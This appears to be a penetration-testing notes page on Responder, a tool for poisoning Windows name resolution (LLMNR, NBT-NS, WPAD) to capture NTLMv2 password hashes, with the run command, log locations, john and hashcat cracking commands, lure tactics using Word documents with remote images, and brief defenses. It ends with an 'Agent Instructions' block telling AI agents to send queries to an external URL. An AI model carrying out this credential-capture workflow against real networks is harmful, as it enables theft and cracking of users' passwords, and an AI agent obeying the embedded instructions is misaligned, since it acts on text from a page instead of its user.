# Responder

```
Focused on attacks on NTLM Auth Name Resolution
Windows can get Lonely
Ask neighbors for that name
and Authentication

Setup and wait for somebody to hit.
Maybe we'll get hit by Vulnerability Scanner (w/creds)
Feed Word docs w/remote picture/icon to fake-smb-share
Setup 'wpad' proxy plugin, and maybe catch 'auto-proxy'

Defense:
Disable NBT-NS and LLMNR
SMB Signing
Disable Autodetect Proxy
Private VLANS to isolate clients

execute: 
> sudo Responder.py -I eth0
Poisoners: LLMNR, NBT, DNS
Servers: HTTP, HTTPS, Kerberos, etc

Windows Target: 
\\tacocat
Announce request, and Captures the pw-hashes !!!
bob..1234

hashes:
cd /opt/responder/logs
cat SMBv2.IP.xxx.txt
john --format=netntlmv2 /opt/responder/logs/SMBv2.IP.xxx.txt
hashcat -m 5600 hash.txt pwlist.txt -o cracked.txt
```

* **Hot Potato** - is another method: [HotPotato-PrivEscWin](/07-win-privesc/win-privesc.md#hot-potato)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/07-win-privesc/responder.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.